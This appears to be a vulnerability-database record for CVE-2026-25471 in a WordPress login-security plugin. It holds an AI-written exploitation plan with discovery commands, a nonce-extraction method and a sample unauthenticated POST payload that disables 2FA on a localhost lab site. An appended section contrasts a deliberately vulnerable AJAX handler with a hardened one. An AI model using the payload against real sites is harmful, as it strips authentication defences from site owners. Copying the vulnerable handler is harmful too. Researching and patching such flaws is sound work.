[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fJ1Q9F-u4uQLofUutvloTgkei1tk03rzVlmneX-nrBdw":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":25,"research_model_used":26,"research_started_at":27,"research_completed_at":28,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":29},"CVE-2026-25471","admin-safety-guard-login-security-2fa-missing-authorization","Admin Safety Guard — Login Security & 2FA \u003C= 1.2.6 - Missing Authorization","The Admin Safety Guard — Login Security & 2FA plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 1.2.6. This makes it possible for unauthenticated attackers to perform an unauthorized action.","admin-safety-guard",null,"\u003C=1.2.6","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-03-16 00:00:00","2026-03-27 20:53:27",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F74b4a2c0-a3c1-4049-aea7-133408ebdf32?source=api-prod",[],"researched",false,3,"This exploitation research plan targets CVE-2026-25471 in the **Admin Safety Guard — Login Security & 2FA** plugin. 
The vulnerability is a \"Missing Authorization\" flaw, which typically means an administrative function is exposed via a `wp_ajax_nopriv_` hook or a REST API route without a `current_user_can()` check.\n\n---\n\n### 1. Vulnerability Summary\nThe **Admin Safety Guard** plugin (up to version 1.2.6) registers one or more AJAX handlers or REST API endpoints that perform sensitive administrative actions (e.g., modifying security settings, clearing logs, or whitelisting IPs). Because these handlers are registered for unauthenticated users (`wp_ajax_nopriv_`) and fail to verify the caller's capabilities, an unauthenticated attacker can manipulate the plugin's security configurations.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Action:** Likely `asg_save_settings`, `asg_clear_logs`, or `asg_update_whitelist` (inferred; agent must verify via `grep`).\n*   **Authentication:** None (Unauthenticated).\n*   **Vulnerable Parameter:** Likely a `settings` array or individual configuration keys passed via `$_POST`.\n*   **Preconditions:** The plugin must be active.\n\n### 3. Code Flow (Inferred)\n1.  **Registration:** The plugin uses `add_action( 'wp_ajax_nopriv_VULNERABLE_ACTION', 'callback_function' )`.\n2.  **Entry Point:** An unauthenticated HTTP POST request is sent to `admin-ajax.php?action=VULNERABLE_ACTION`.\n3.  **Missing Check:** The `callback_function` calls `check_ajax_referer()` (verifying the nonce) but fails to call `current_user_can( 'manage_options' )`.\n4.  **Sink:** The function proceeds to call `update_option()` or `global $wpdb; $wpdb->query(...)` to modify plugin state.\n\n### 4. Nonce Acquisition Strategy\nMissing Authorization vulnerabilities often still require a valid Nonce for CSRF protection. To exploit this as an unauthenticated user, we must find where the plugin leaks the nonce to the frontend.\n\n1.  
**Identify the Script\u002FVariable:** Search for `wp_localize_script` in the plugin code to find the JS object containing the nonce.\n    *   *Search command:* `grep -rn \"wp_localize_script\" .`\n2.  **Determine the Triggering Content:** Identify if the script is enqueued on the homepage or requires a specific shortcode.\n    *   *Search command:* `grep -rn \"add_shortcode\" .`\n3.  **Extraction Steps:**\n    *   **Step A:** Create a page with the identified shortcode (if necessary):\n        `wp post create --post_type=page --post_status=publish --post_content='[shortcode_found]'`\n    *   **Step B:** Use `browser_navigate` to view the page.\n    *   **Step C:** Use `browser_eval` to extract the nonce.\n        *   *Example Variable (verify in source):* `window.asg_vars?.nonce` or `window.asg_ajax_object?.security`.\n\n### 5. Exploitation Strategy\nOnce the action name and nonce are identified, follow these steps:\n\n1.  **Discovery:** Run the following to find the specific vulnerable action:\n    ```bash\n    grep -r \"wp_ajax_nopriv_\" .\n    ```\n    Examine the callback functions. Look for those that update options but lack `current_user_can`.\n\n2.  **Target Action (Example: `asg_save_settings`):**\n    If the function is `asg_save_settings_callback`, look at the `$_POST` parameters it expects (e.g., `settings_data`).\n\n3.  **HTTP Request via `http_request`:**\n    ```javascript\n    \u002F\u002F Example Payload to disable a security feature (e.g., 2FA)\n    {\n      \"method\": \"POST\",\n      \"url\": \"http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php\",\n      \"headers\": {\n        \"Content-Type\": \"application\u002Fx-www-form-urlencoded\"\n      },\n      \"body\": \"action=asg_save_settings&security=EXTRACTED_NONCE&asg_options[enable_2fa]=0\"\n    }\n    ```\n\n### 6. Test Data Setup\n1.  **Install Plugin:** Ensure `admin-safety-guard` v1.2.6 is installed.\n2.  
**Configure Settings:** Use WP-CLI to enable a security setting that you intend to disable via the exploit:\n    `wp option update asg_settings '{\"enable_2fa\":\"1\", \"whitelist_ip\":\"\"}' --format=json`\n3.  **Create Nonce Source:** If the nonce is only on specific pages, create that page:\n    `wp post create --post_type=page --post_title=\"Security\" --post_status=publish --post_content='[asg_login_form]'` (Example shortcode).\n\n### 7. Expected Results\n*   **Response:** The server should return a `200 OK` or a JSON success message (e.g., `{\"success\":true}`).\n*   **State Change:** The targeted WordPress option (e.g., `asg_settings`) is updated in the database, effectively disabling security controls.\n\n### 8. Verification Steps\nAfter the `http_request`, verify the change via WP-CLI:\n```bash\n# Check if the setting was modified\nwp option get asg_settings --format=json\n```\nIf the exploit was to whitelist an IP, check the specific option or database table:\n```bash\nwp db query \"SELECT * FROM wp_options WHERE option_name = 'asg_whitelist'\"\n```\n\n### 9. Alternative Approaches\n*   **REST API:** If no AJAX handlers are found, search for `register_rest_route`. Look for routes where `permission_callback` is set to `__return_true` or is missing.\n    *   *Search command:* `grep -rn \"register_rest_route\" . -A 5`\n*   **Direct Option Update:** Some plugins use `admin_init` hooks that don't check for AJAX\u002FREST context. Check for functions hooked to `admin_init` that process `$_POST` directly.\n    *   *Search command:* `grep -rn \"add_action.*admin_init\" .` (Note: `admin_init` also runs on `admin-ajax.php`).","The Admin Safety Guard — Login Security & 2FA plugin for WordPress is vulnerable to unauthorized access because it registers administrative AJAX actions for unauthenticated users without performing capability checks. 
This would allow an unauthenticated attacker to modify the plugin's security configuration; the concrete actions named in the plan (disabling two-factor authentication, clearing security logs) are inferred and have not been verified against the plugin source.","To exploit a flaw of this type, an unauthenticated attacker first obtains a valid AJAX nonce from the site's front end, where the plugin localizes script variables (for example, a JS object such as asg_vars; the name is inferred). Using this nonce, the attacker sends a POST request to \u002Fwp-admin\u002Fadmin-ajax.php with an action parameter naming an administrative function (asg_save_settings is an inferred example) and parameters intended to overwrite security options. If the plugin registers the handler with a wp_ajax_nopriv_ hook and the callback lacks a current_user_can() check, the request is processed despite the lack of authentication; the nonce check alone proves only that the request originated from a page that rendered the nonce, not that the caller is authorized.","gemini-3-flash-preview","2026-04-18 03:30:34","2026-04-18 03:30:54",{"type":30,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":31},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fadmin-safety-guard\u002Ftags"]
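The following is an added illustrative example, not code from the Admin Safety Guard plugin or from the research record above. It shows the handler shape that Section 3 of the plan describes (a `wp_ajax_nopriv_` registration whose callback verifies a nonce but never checks a capability) next to a hardened equivalent. Every hook, option, nonce and setting name in it (`example_save_settings`, `example_settings`, `example_settings_nonce`, `enable_2fa`, `whitelist_ip`) is hypothetical.

```php
<?php
/**
 * Illustrative WordPress AJAX handler pair for the "Missing Authorization"
 * pattern. Hypothetical names throughout; not the plugin's own code.
 */

// --- Vulnerable pattern -----------------------------------------------------
// Registered for both logged-in and anonymous callers. check_ajax_referer()
// only proves the request came from a page that rendered the nonce, which any
// visitor can obtain when the nonce is localized on the front end. Nothing
// asks whether the caller is allowed to change site settings.
add_action( 'wp_ajax_example_save_settings', 'example_save_settings_vulnerable' );
add_action( 'wp_ajax_nopriv_example_save_settings', 'example_save_settings_vulnerable' );

function example_save_settings_vulnerable() {
    check_ajax_referer( 'example_settings_nonce', 'security' );

    $incoming = isset( $_POST['example_options'] ) ? (array) $_POST['example_options'] : array();
    $settings = (array) get_option( 'example_settings', array() );

    // Sink: attacker-controlled keys overwrite the stored configuration.
    update_option( 'example_settings', array_merge( $settings, $incoming ) );
    wp_send_json_success( array( 'saved' => true ) );
}

// --- Hardened pattern -------------------------------------------------------
// 1. No wp_ajax_nopriv_ registration: for an unauthenticated request the
//    action simply does not exist and admin-ajax.php answers "0".
// 2. check_ajax_referer() still defends a logged-in admin against CSRF.
// 3. current_user_can() is the authorization check the vulnerable version lacks.
// 4. Only an allow-list of keys is accepted and each value is coerced or
//    validated, so a caller cannot inject arbitrary option keys or values.
add_action( 'wp_ajax_example_save_settings_hardened', 'example_save_settings_hardened' );

function example_save_settings_hardened() {
    check_ajax_referer( 'example_settings_nonce', 'security' );

    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'forbidden' ), 403 );
    }

    $incoming = isset( $_POST['example_options'] ) ? (array) wp_unslash( $_POST['example_options'] ) : array();
    $settings = (array) get_option( 'example_settings', array() );

    $allowed = array(
        'enable_2fa'   => 'bool',
        'whitelist_ip' => 'ip',
    );

    foreach ( $allowed as $key => $type ) {
        if ( ! array_key_exists( $key, $incoming ) ) {
            continue;
        }
        if ( 'bool' === $type ) {
            $settings[ $key ] = ! empty( $incoming[ $key ] ) ? '1' : '0';
        } elseif ( 'ip' === $type ) {
            $ip = sanitize_text_field( $incoming[ $key ] );
            if ( '' !== $ip && ! filter_var( $ip, FILTER_VALIDATE_IP ) ) {
                continue; // malformed input: keep the stored value
            }
            $settings[ $key ] = $ip;
        }
    }

    update_option( 'example_settings', $settings );
    wp_send_json_success( array( 'saved' => true ) );
}
```

When auditing a plugin for this class, the discovery step in Section 5 of the plan is the right one: list every `wp_ajax_nopriv_` registration, follow each callback, and treat a handler that reaches `update_option()`, `delete_option()` or a direct `$wpdb` write without a `current_user_can()` guard as a finding. A nonce check on its own is never evidence of authorization, because the nonce is handed to whoever loads the page that localizes it.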